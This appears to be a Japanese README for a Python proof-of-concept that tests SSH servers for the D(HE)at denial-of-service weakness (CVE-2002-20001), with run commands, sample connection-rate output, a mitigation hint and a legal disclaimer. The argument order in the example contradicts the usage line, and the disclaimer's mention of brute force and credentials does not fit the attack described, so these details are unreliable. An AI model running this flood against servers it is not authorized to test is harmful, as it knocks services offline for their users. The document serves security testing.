
CVE-2002-20001 の D(HE)at DoS 攻撃の存在をテストするための POC
SSHサービスにおけるD(HE)at DoS攻撃(CVE-2002-20001)の存在をテストするためのPoC
コマンド: python3 dheat_dos_attack_poc.py <IP_Address> <Port_Number>
<IP_Address>: テストを許可されているSSHサーバーの実際のIPアドレスまたはホスト名に置き換えます。
<Port_Number>: SSHサービスが稼働しているターゲットポート番号。
実行手順: Ubuntu、KaliなどにPython 3をインストールする場合の基本コマンドは次のとおりです。
$ sudo apt update
$ sudo apt install python3
ダウンロードとファイル権限の変更:
$ git clone https://github.com/itmaniac/dheat_dos_attack_poc.git
$ cd dheat_dos_attack_poc
$ chmod +x dheat_dos_attack_poc.py
D(HE)at DoS攻撃PoCテスト:
$ python3 dheat_dos_attack_poc.py 22 10.0.0.1
10.0.0.1:22 への50接続の確立を試行中...
--- テスト結果 ---
ターゲット: 10.0.0.1:22
総接続試行回数: 50
成功した接続: 50
失敗した接続: 0
総所要時間: 0.025秒
接続レート: 1981.66 接続/秒
警告: 接続レートが依然として高い(20.0 接続/秒以上)。DHEat DoSに対して脆弱である可能性があります。 注意: サーバーで 'PerSourceMaxStartups 1' が設定されている場合、これは誤検知である可能性があります。 サーバーは単一ソースから保護されているため、多くの一意の接続を処理できたとしてもです。
このスクリプトは、教育および合法的なペネトレーションテスト目的でのみ提供されています。作者は、このツールの不正または無許可の使用を容認または支持しません。
利用条件:
SSHサービスをテストする前に、システム所有者から明示的な書面による許可を得ている必要があります。 所有しているシステム、または法的にテストを許可されているシステムでのみ使用してください。 該当するすべての地域、国内、国際法を遵守してください。 適切な許可なしに本番システムに対してこのツールを使用しないでください。 使用する認証情報は、テスト用アカウントまたはダミーの認証情報である必要があります。 このスクリプトを使用することにより、あなたは以下に同意したものとみなされます:
その使用に起因するいかなる結果に対しても、あなたが単独で責任を負うこと。 作者は誤用または損害に対する責任を負わないこと。 このツールを悪意のある目的で使用しないこと。 このツールはブルートフォース攻撃をシミュレートし、セキュリティアラートやアカウントロックアウトを引き起こす可能性があります。常に注意して適切な許可を得た上で使用してください。
D(HE)at サービス拒否(DoS)脆弱性(CVE-2002-20001)に関するこの概念実証(PoC)スクリプトは、Szilárd Pfeiffer 氏による優れた研究に触発されたものです。この脆弱性に関する彼の詳細な研究は、https://dheatattack.com/ でご覧いただけます。
このスクリプトは教育およびテスト目的のための独立した実装ですが、サイバーセキュリティコミュニティへの彼らの貴重な貢献によって特定・文書化された攻撃ベクトルに直接対応しています。